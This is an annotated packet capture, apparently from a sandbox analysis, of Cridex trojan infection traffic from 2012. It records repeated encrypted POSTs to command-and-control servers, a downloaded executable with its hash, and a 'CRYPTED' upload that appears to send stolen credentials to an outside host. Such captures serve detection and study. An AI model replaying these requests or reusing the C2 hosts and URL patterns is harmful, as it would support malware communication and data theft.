Cridex + downloaded password stealer Network Traffic

1. -----------details-internet traffic-------------------
2. //Try to reach 208.87.243.18
3. 192.168.7.84 208.87.243.18 TCP sbl > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
4. 208.87.243.18 192.168.7.84 TCP http-alt > sbl [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
5.  
6. // a http POST command to 74.207.237.170:8080
7. 192.168.7.84 74.207.237.170:8080 HTTP POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
8.  
9. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
10. Accept: */*
11. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
12. Host: 74.207.237.170:8080
13. Content-Length: 347
14. Connection: Keep-Alive
15. Cache-Control: no-cache
16. ......dU..ZP....Y.yy..|4$R.".....u...+T..1L.;I.n6v39.+..
17. DP.....O@xt,U..V|............c1..4~:
18. R.E.........K.:+.....Z`.. y.....e.z...B.....^...bG..B.opBx0E\
19. .....B..N.]....g.^......59.L.l.M.....>q)..Q...\5..p...M..q...
20. W-.*...u.P.\p......2.K..HM7..~Z?vX.p.W..0.m....A?.u....=|<.\.'
21. .......5._7'..46..G\.o" ....}...E..K...2eE..,.U.=.C....KtU....
22. u..2.~@
23.  
24. 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
25. 0010 01 83 00 3f 40 00 80 06 f8 bf c0 a8 07 54 4a cf ...?@... .....TJ.
26. 0020 ed aa 04 11 1f 90 5a 54 91 b8 89 da 8f 5b 50 18 ......ZT .....[P.
27. 0030 42 30 27 30 00 00 2e d7 f7 a7 03 ea 64 55 cf d6 B0'0.... ....dU..
28. 0040 5a 50 e9 81 b2 b6 59 09 79 79 e6 b8 7c 34 24 52 ZP....Y. yy..|4$R
29. 0050 a3 22 06 a4 11 86 ac 75 e0 08 b3 2b 54 12 a4 31 .".....u ...+T..1
30. : : : :
31. 0130 70 18 57 c8 97 30 ac 6d 93 08 fb a2 41 3f aa 75 p.W..0.m ....A?.u
32. 0140 c7 83 e7 af 3d 7c 3c ef 5c 05 27 83 1e 2e d1 9b ....=|<. \.'.....
33. 0150 88 df 35 1f 5f 37 27 f1 f9 34 36 0e b0 47 5c b7 ..5._7'. .46..G\.
34. 0160 6f 22 20 16 cb e9 9c 7d 01 98 08 45 9f a5 4b bf o" ....} ...E..K.
35. 0170 d5 90 32 65 45 e4 e9 2c b0 55 1d 3d ca 43 e2 e8 ..2eE.., .U.=.C..
36. 0180 d8 d5 4b 74 55 e1 f6 9e 8d 75 a1 92 32 1c 7e 40 ..KtU... .u..2.~@
37. 0190 7c |
38.  
39. // With the encryption reply long binary data...
40.  
41. Server: nginx/1.0.10
42. Date: Sat, 15 Dec 2012 09:58:07 GMT
43. Content-Type: text/html; charset=UTF-8
44. Transfer-Encoding: chunked
45. Connection: keep-alive
46. X-Powered-By: PHP/5.3.18-1~dotdeb.0
47. Vary: Accept-Encoding
48. f3b
49. .}.%..k..o.-..U...........C..8.C.0...o...E.d... snip
50. 2U...`......p_| ]X.$...B..A.F....}.snip
51. .@C...4*j..|.\..%..xv-.....snip
52. .1..x.....2.....`3....3.1..7......M.k..r-5s.8P=snip
53. z.nT^MV..{+=3ym........Gj.3JV....x..xe{@.......snip
54. [.UK.un2.>.W`..{.9'+.7*f..v.................F.M.snip
55. v....[...M.O.......P2.....;..a\..^..Rv&..9P...xsnip
56. n..Z...fG..t...1.|...`Vsnip
57. ...#^&5.[...K...!i}...}.44...@...Zp`.."....*...snip
58. %.(.....T .C.Md.#-.{q........G.&5+.N.,.R.....V>snip
59. .g.{1...d..+t....T.g$....#..bMQ.f.5x.....pM'"a.snip
60. :
61. :snip
62. :
63. .%......8{..6...J..$:?..E.+..C"...V'uZ1M..$Cy6}.1snip
64. 3.!.i~..N.a..;^..+..a..[..J.~...7}....W...q.rR..n(."snip
65. .<p....N....,..v......R...d..U_...?....k...-.....E%.snip
66. ...a.AZ$......H...7r......
67. 0
68.  
69. ////Some more comm try to connect to 132.248.49.112
70.  
71. 192.168.7.84 132.248.49.112 TCP afrog > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
72. 132.248.49.112 192.168.7.84 TCP http-alt > afrog [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
73.  
74.  
75. // At this point, in the %Temp% folder, the previous data was saved:
76.  
77.  
78. FileName: exp2.tmp.exe
79. tiimeStamp: 2012/12/15 18:58 122,880
80. MD5 ce7474646297ed818bb8ed48f50c7e1e
81.  
82.  
83. // DNS requests to...
84.  
85. 112.49.248.132.in-addr.arpa web.ecologia.unam.mx
86. 77.65.130.113.in-addr.arpa ns.shinbiro.com..domain
87.  
88. 00000000 35 ea 01 00 00 01 00 00 00 00 00 00 03 31 31 32 5....... .....112
89. 00000010 02 34 39 03 32 34 38 03 31 33 32 07 69 6e 2d 61 .49.248. 132.in-a
90. 00000020 64 64 72 04 61 72 70 61 00 00 0c 00 01 ddr.arpa .....
91. 00000000 35 ea 81 80 00 01 00 01 00 00 00 00 03 31 31 32 5....... .....112
92. 00000010 02 34 39 03 32 34 38 03 31 33 32 07 69 6e 2d 61 .49.248. 132.in-a
93. 00000020 64 64 72 04 61 72 70 61 00 00 0c 00 01 c0 0c 00 ddr.arpa ........
94. 00000030 0c 00 01 00 00 1c 1f 00 16 03 77 65 62 08 65 63 ........ ..web.ec
95. 00000040 6f 6c 6f 67 69 61 04 75 6e 61 6d 02 6d 78 00 ologia.u nam.mx.
96. 0000002D cb 61 01 00 00 01 00 00 00 00 00 00 02 37 37 02 .a...... .....77.
97. 0000003D 36 35 03 31 33 30 03 31 31 33 07 69 6e 2d 61 64 65.130.1 13.in-ad
98. 0000004D 64 72 04 61 72 70 61 00 00 0c 00 01 dr.arpa. ....
99. 0000004F cb 61 81 83 00 01 00 00 00 01 00 00 02 37 37 02 .a...... .....77.
100. 0000005F 36 35 03 31 33 30 03 31 31 33 07 69 6e 2d 61 64 65.130.1 13.in-ad
101. 0000006F 64 72 04 61 72 70 61 00 00 0c 00 01 c0 0f 00 06 dr.arpa. ........
102. 0000007F 00 01 00 00 07 07 00 2e 02 6e 73 08 73 68 69 6e ........ .ns.shin
103. 0000008F 62 69 72 6f 03 63 6f 6d 00 06 64 6f 6d 61 69 6e biro.com ..domain
104. 0000009F c0 3b 77 bf 64 79 00 00 2a 30 00 00 0e d8 00 12 .;w.dy.. *0......
105. 000000AF 75 00 00 01 51 80 u...Q.
106.  
107.  
108. //Another POST command detected to 203.113.98.131:80
109. POST /asp/intro.php HTTP/1.0
110. Host: 203.113.98.131
111. Accept: */*
112. Accept-Encoding: identity, *;q=0
113. Content-Length: 257
114. Connection: close
115. Content-Type: application/octet-stream
116. Content-Encoding: binary
117. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
118.  
119. CRYPTED0...DK.V..aa..c.....PI%.^D.|2.s;.p..T=....*.........MX.../......../.;(.dl7).c..).......Jk.rO..e....!].......w
120. .....}..5.+..6.SD4.>
121. t......K...M........\..G...7V/..5].....|.....#.....=.P*^k.....b3cm.8..6..O...T....$|.......yb.~#...k0.|........o...[JD.HTTP/1.1 200 OK
122.  
123. Server: nginx/1.0.10
124. Date: Sat, 15 Dec 2012 10:01:37 GMT
125. Content-Type: text/html; charset=windows-1251
126. Connection: close
127. X-Powered-By: PHP/5.3.18-1~dotdeb.0
128. Vary: Accept-Encoding
129. Content-Length: 16
130.  
131. STATUS-IMPORT-OK
132.  
133. // At this point the malware process exp2.tmp.exe was started....
134.  
135.  
136.  
137.  
138.  
139.  
140. ---------------take 2---------------------
141.  
142. // send ACK packet (try to connect) to 74.207.237.170
143.  
144. 192.168.7.84 74.207.237.170 TCP danf-ak2 > http-alt [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
145.  
146.  
147. // send ping to 209.190.61.50
148.  
149. 209.190.61.50 192.168.7.84 ICMP Time-to-live exceeded (Time to live exceeded in transit)
150. 209.190.61.50 192.168.7.84 ICMP Time-to-live exceeded (Time to live exceeded in transit)
151.  
152.  
153. // make communications via HTTP/POST to 174.143.174.136:8080
154.  
155. //post....
156. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
157. Accept: */*
158. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
159. Host: 174.143.174.136:8080
160. Content-Length: 408
161. Connection: Keep-Alive
162. Cache-Control: no-cache
163. .m......(...P..0.w.j."...V....s.x.....c.....FH..?.. .I.t..`....OA&../.?$..._J..
164. .....b...ws.'I..l..r........}....+`91.R..+..P.....7q..+Q...........-\g'G.6..l...rV..[.4S..K.5'!?...=.......S...2AkUh..S....b4..#....!.$.
165. .+d;K..].>&....._g.w...i)..}.,.....f..YD.G.KI....9......rZ
166. .~q.+......Sk.i...........t....!.m*......;..w."...[.'
167. ..i...:..$..w.....X1gR+..U}b..U..../....(...K.FIAVR..4.....,...ujk...i....H..eHTTP/1.1 200 OK
168.  
169. // reply:
170. Server: nginx/1.0.10
171. Date: Sat, 15 Dec 2012 10:13:52 GMT
172. Content-Type: text/html; charset=UTF-8
173. Connection: keep-alive
174. X-Powered-By: PHP/5.3.18-1~dotdeb.0
175. Vary: Accept-Encoding
176. Content-Length: 165
177. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
178. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
179. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
180. 2U...`......\z#W.2.Pp_..NU..
181.  
182.  
183. // post...
184. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
185. Accept: */*
186. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
187. Host: 174.143.174.136:8080
188. Content-Length: 387
189. Connection: Keep-Alive
190. Cache-Control: no-cache
191. ........b,.B..k'..`.9...r...7)@.~..^..E..o....y..YP .o...*gp......y..w........QF..^...J.......oV)vs..0eh....H....h7.K%Q,.c..I.U~S...\..?....g...Re,...\.?<.]2~.kw..M..t._.?.z.M<...h.-..Q.W.......Dg.3.1.."{Tf..RKw..9".T.......-."
192. ..f(X..8..._...3*~+.%..Y.FH...\..:../.!.1G.I9..........o).........6*dXm.|-....$.6.. ..........8.....TJ...U....4TX.IdJ|b.=.e....h.G.....A...>.pC6.......]t..C'..HTTP/1.1 200 OK
193.  
194. //reply....
195. Server: nginx/1.0.10
196. Date: Sat, 15 Dec 2012 10:13:52 GMT
197. Content-Type: text/html; charset=UTF-8
198. Connection: keep-alive
199. X-Powered-By: PHP/5.3.18-1~dotdeb.0
200. Vary: Accept-Encoding
201. Content-Length: 165
202. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
203. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
204. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
205. 2U...`........X.'8...".~K..J.
206.  
207.  
208.  
209. // Try to esablish connection with 199.71.215.194
210.  
211. 192.168.7.84 199.71.215.194 TCP cognex-insight > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
212. 199.71.215.194 192.168.7.84 TCP http-alt > cognex-insight [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
213.  
214.  
215. // Communication via HTTP/POST with 210.56.23.100:8080
216.  
217. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
218. Accept: */*
219. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
220. Host: 210.56.23.100:8080
221. Content-Length: 387
222. Connection: Keep-Alive
223. Cache-Control: no-cache
224. ./Pl$,........*|.`..9...R{...B.....A...#.H..K.=e.......(.np...nn..y...M a.........2S...S..{|?....A.k..........
225. ..Q#.g..~........S...\..?....g...Re,....s.I..]..,......@I.R..P.n....I;te.<&......-9.!......8j...R.......Y....*.D&..={pY.3.l".;......xn..g.N.....T..,>..rOJ!..D=.>.J..
226. .(q..... ..P&....m.u6.....?....#.).W.........z....(.FF
227. V.R
228. ...-v!..38s)ab|....bKU..$..S..</.
229. )4..1+...>.O.....HTTP/1.1 200 OK
230.  
231. Server: nginx/1.0.11
232. Date: Sat, 15 Dec 2012 10:05:22 GMT
233. Content-Type: text/html; charset=UTF-8
234. Connection: keep-alive
235. X-Powered-By: PHP/5.3.18-1~dotdeb.0
236. Vary: Accept-Encoding
237. Content-Length: 165
238. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
239. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
240. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
241. 2U...`.........c.M..A..9.....
242.  
243. //try connect again with 132.248.49.112
244.  
245. 192.168.7.84 132.248.49.112 TCP rdrmshc > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
246. 132.248.49.112 192.168.7.84 TCP http-alt > rdrmshc [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
247.  
248. // try to connect w/ 74.117.61.66
249.  
250. 192.168.7.84 74.117.61.66 TCP socks > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
251. 74.117.61.66 192.168.7.84 TCP http-alt > socks [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
252.  
253.  
254. Communicating via HTTP/POST w/210.56.23.100:8080
255.  
256. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
257. Accept: */*
258. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
259. Host: 210.56.23.100:8080
260. Content-Length: 387
261. Connection: Keep-Alive
262. Cache-Control: no-cache
263. ./Pl$,........*|.`..9...R{...B.....A...#.H..K.=e.......(.np...nn..y...M a.........2S...S..{|?....A.k..........
264. ..Q#.g..~........S...\..?....g...Re,....s.I..]..,......@I.R..P.n....I;te.<&......-9.!......8j...R.......Y....*.D&..={pY.3.l".;......xn..g.N.....T..,>..rOJ!..D=.>.J..
265. .(q..... ..P&....m.u6.....?....#.).W.........z....(.FF
266. V.R
267. ...-v!..38s)ab|....bKU..$..S..</.
268. )4..1+...>.O.....HTTP/1.1 200 OK
269.  
270. Server: nginx/1.0.11
271. Date: Sat, 15 Dec 2012 10:05:22 GMT
272. Content-Type: text/html; charset=UTF-8
273. Connection: keep-alive
274. X-Powered-By: PHP/5.3.18-1~dotdeb.0
275. Vary: Accept-Encoding
276. Content-Length: 165
277. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
278. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
279. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
280. 2U...`.........c.M..A..9.....
281.  
282.  
283. //Try to communicate w/ 173.192.229.36
284.  
285. 173.192.229.36 192.168.7.84 TCP http-alt > mctp [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
286. 192.168.7.84 173.192.229.36 TCP mctp > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
287.  
288.  
289. // Communication HTTTP/POST with 69.64.89.82:8080
290.  
291.  
292. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
293. Accept: */*
294. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
295. Host: 69.64.89.82:8080
296. Content-Length: 387
297. Connection: Keep-Alive
298. Cache-Control: no-cache
299. ..[.
300. 8.|.
301. . ...+...n.^.7.Mh=..R......Y....I.r$.O.....j..g..7l.4p#&....H.G5..P-.........ld}.l[......xd&..?
302. ....)...>))'D;vgQ.....S...\..?....g...Re,.O..j.~y....+..?.S......a..5.....L.%.3v.........
303. .......g.Xf...f..0.i`f..].E~\Z..4.G.....Nn.b..~......Dw.N...S.iW.......oI...W....t.!Hp.#8h..uAK...4L......j....f...]./
304. .e...3k.o.b......T....[lm^8.X......l...."+9...2.v.\...GN..-....?.A".5wkRHTTP/1.1 200 OK
305.  
306. Server: nginx/1.0.10
307. Date: Sat, 15 Dec 2012 02:51:22 GMT
308. Content-Type: text/html; charset=UTF-8
309. Connection: keep-alive
310. X-Powered-By: PHP/5.3.18-1~dotdeb.0
311. Vary: Accept-Encoding
312. Content-Length: 165
313. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
314. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
315. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
316. 2U...`......O..z.zj....>..;..
317.  
318.  
319. // try to establish conn to: 173.224.221.135
320.  
321. 192.168.7.84 173.224.221.135 TCP ltp-deepspace > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
322. 173.224.221.135 192.168.7.84 TCP http-alt > ltp-deepspace [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
323.  
324.  
325. // try to estacblish conn to: 59.90.221.6
326.  
327. 192.168.7.84 59.90.221.6 TCP ardus-trns > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
328. 59.90.221.6 192.168.7.84 TCP http-alt > ardus-trns [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
329.  
330.  
331. // try to establish to 180.235.150.72
332.  
333. 192.168.7.84 180.235.150.72 TCP sacred > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
334. 180.235.150.72 192.168.7.84 TCP http-alt > sacred [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
335.  
336. // Communicating via HTTP/POST to 123.49.61.59:8080
337.  
338. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
339. Accept: */*
340. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
341. Host: 123.49.61.59:8080
342. Content-Length: 387
343. Connection: Keep-Alive
344. Cache-Control: no-cache
345. ...:..'....F..oP.Ka.2U.d....N~9..|.....,..
346. ...
347. 8....!'......Cr..,.8
348. ..F[....z.%_...p.L..........C':.rq.t...U..H..7.b.........I.IS...\..?....g...Re,..C...V..:...D.....W.3..jO...Sh`j.4.,....A.#..zcm.G.....D.6..4/.........s4\>..G.dh...........-........).%j...-mG..#W.......&d.....g.Y..(.w.Vs&.rj...uAV....>^1.J.J..4.....M...Rp..%..n.k.....wt....x........}.z`..d.:.$
349. ..9..:...;I\....G/.G....HTTP/1.1 200 OK
350.  
351. Server: nginx/1.0.10
352. Date: Sat, 15 Dec 2012 10:29:47 GMT
353. Content-Type: text/html; charset=UTF-8
354. Connection: keep-alive
355. X-Powered-By: PHP/5.3.18-1~dotdeb.0
356. Vary: Accept-Encoding
357. Content-Length: 165
358. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
359. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
360. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
361. 2U...`.......^...R.L&F..x....POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
362.  
363. Accept: */*
364. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
365. Host: 123.49.61.59:8080
366. Content-Length: 387
367. Connection: Keep-Alive
368. Cache-Control: no-cache
369. g..7...:R...g\.....F......@..8B..w...}.28..^....})u...ZR.exi.f......h..T..s..j..4..'m.E....SZ?.R@f.
370. .l...(>..U.~N=;..Z......&...S...\..?....g...Re,.,.".+..y.&U..X.f...G7J.$ s
371. ..7#?..3..b.UC.]....`.-.,.......v....C......F9'.&...Q.L..A..6+..N.Vx.......+.R..o.l...%.Q.qSR.W..IBpoy...Y. n..7b
372. ..jW.qO.*.j.'..f)I_7.
373. R...5.0AY7....m..X...>..\M.QN.p.r.P.&f......Y.0.'..!e..j.s.-w>.HwL..j.0..[.
374. HTTP/1.1 200 OK
375.  
376. Server: nginx/1.0.10
377. Date: Sat, 15 Dec 2012 10:30:01 GMT
378. Content-Type: text/html; charset=UTF-8
379. Connection: keep-alive
380. X-Powered-By: PHP/5.3.18-1~dotdeb.0
381. Vary: Accept-Encoding
382. Content-Length: 165
383. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
384. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
385. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
386. 2U...`......,.&.3.."cz@..[.a.
387.  
388.  
389. // Communicating with HTTP/POST with 123.49.61.59:8080
390.  
391. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
392. Accept: */*
393. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
394. Host: 123.49.61.59:8080
395. Content-Length: 387
396. Connection: Keep-Alive
397. Cache-Control: no-cache
398. .K.Vn%d...;.Q6K.vq..)...T...e.,....c.q.K..............-.....t:.Hy(.....K.....t.d.......L,..7...}%..h&...?..)..*.@....Hg...ys.$A.S...\..?....g...Re,....H1ij..b.KC.....DJ....y.C2.I.0....#.4
399. ...H...hi....~.T%5.M*v..z`..v....r..b....K.yQ...Se..5....Z2.r.+...H9..8.^A..>....".....]..&....\...`"/r...:e.mO..w.4..7...Q..!...Ll..(..I.M>x.\.Y>...ET...=.S.'.....(..(
400. ...4Q.F.LN.......AI.&.*.w.u4..HTTP/1.1 200 OK
401.  
402. Server: nginx/1.0.10
403. Date: Sat, 15 Dec 2012 10:29:45 GMT
404. Content-Type: text/html; charset=UTF-8
405. Connection: keep-alive
406. X-Powered-By: PHP/5.3.18-1~dotdeb.0
407. Vary: Accept-Encoding
408. Content-Length: 165
409. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
410. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
411. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
412. 2U...`.........X)myU.>.^....JPOST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
413.  
414. Accept: */*
415. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
416. Host: 123.49.61.59:8080
417. Content-Length: 387
418. Connection: Keep-Alive
419. Cache-Control: no-cache
420. ...:..'....F..oP.Ka.2U.d....N~9..|.....,..
421. ...
422. 8....!'......Cr..,.8
423. ..F[....z.%_...p.L..........C':.rq.t...U..H..7.b.........I.IS...\..?....g...Re,..C...V..:...D.....W.3..jO...Sh`j.4.,....A.#..zcm.G.....D.6..4/.........s4\>..G.dh...........-........).%j...-mG..#W.......&d.....g.Y..(.w.Vs&.rj...uAV....>^1.J.J..4.....M...Rp..%..n.k.....wt....x........}.z`..d.:.$
424. ..9..:...;I\....G/.G....HTTP/1.1 200 OK
425.  
426. Server: nginx/1.0.10
427. Date: Sat, 15 Dec 2012 10:29:47 GMT
428. Content-Type: text/html; charset=UTF-8
429. Connection: keep-alive
430. X-Powered-By: PHP/5.3.18-1~dotdeb.0
431. Vary: Accept-Encoding
432. Content-Length: 165
433. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
434. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
435. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
436. 2U...`.......^...R.L&F..x....POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
437.  
438. Accept: */*
439. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
440. Host: 123.49.61.59:8080
441. Content-Length: 387
442. Connection: Keep-Alive
443. Cache-Control: no-cache
444. g..7...:R...g\.....F......@..8B..w...}.28..^....})u...ZR.exi.f......h..T..s..j..4..'m.E....SZ?.R@f.
445. .l...(>..U.~N=;..Z......&...S...\..?....g...Re,.,.".+..y.&U..X.f...G7J.$ s
446. ..7#?..3..b.UC.]....`.-.,.......v....C......F9'.&...Q.L..A..6+..N.Vx.......+.R..o.l...%.Q.qSR.W..IBpoy...Y. n..7b
447. ..jW.qO.*.j.'..f)I_7.
448. R...5.0AY7....m..X...>..\M.QN.p.r.P.&f......Y.0.'..!e..j.s.-w>.HwL..j.0..[.
449. HTTP/1.1 200 OK
450.  
451. Server: nginx/1.0.10
452. Date: Sat, 15 Dec 2012 10:30:01 GMT
453. Content-Type: text/html; charset=UTF-8
454. Connection: keep-alive
455. X-Powered-By: PHP/5.3.18-1~dotdeb.0
456. Vary: Accept-Encoding
457. Content-Length: 165
458. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
459. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
460. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
461. 2U...`......,.&.3.."cz@..[.a.
462.  
463.  
464. //Try to establish conn to: 113.130.65.77
465.  
466. 192.168.7.84 113.130.65.77 TCP hpvmmcontrol > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
467. 113.130.65.77 192.168.7.84 TCP http-alt > hpvmmcontrol [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
468.  
469. //Try to establish conn to: 180.235.150.72
470.  
471. 802 795.966247 192.168.7.84 180.235.150.72 TCP saphostctrls > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
472. 803 796.070637 180.235.150.72 192.168.7.84 TCP http-alt > saphostctrls [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
473.  
474. // making communication via HTTP/POST to 69.64.89.82:8080
475.  
476.  
477. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
478. Accept: */*
479. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
480. Host: 69.64.89.82:8080
481. Content-Length: 387
482. Connection: Keep-Alive
483. Cache-Control: no-cache
484. .X...j.K.!L.C..............3.8.|...........w..9...W
485. .K.Q....se.....k....y.;..6=$..%%.O....k'....iu|......=.?u..]%....?../...\...S...\..?....g...Re,.]...n.G.j..0O.X.rQ
486. l...[.h.........-.zR..J\...".Q
487. w..Yv..}:n..R.....6z.S0......_+.sXx....3n!.w..]k.o...d;^......b...8.h8.g.a...C.|C...m...4.M..[
488. .T..3!k..T.U=1N.~d.c..C.m....
489. ..}..&..y_5..u
490. ..Z...Z4;.u@..|A..&..G|}._.\.L.....A....u..|`..'.
491.  
492. HTTP/1.1 200 OK
493. Server: nginx/1.0.10
494. Date: Sat, 15 Dec 2012 02:55:11 GMT
495. Content-Type: text/html; charset=UTF-8
496. Connection: keep-alive
497. X-Powered-By: PHP/5.3.18-1~dotdeb.0
498. Vary: Accept-Encoding
499. Content-Length: 165
500. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
501. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
502. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
503. 2U...`......]...v.T.v..%s.\.$
504.  
505. -----------------------------internet data ends--------------------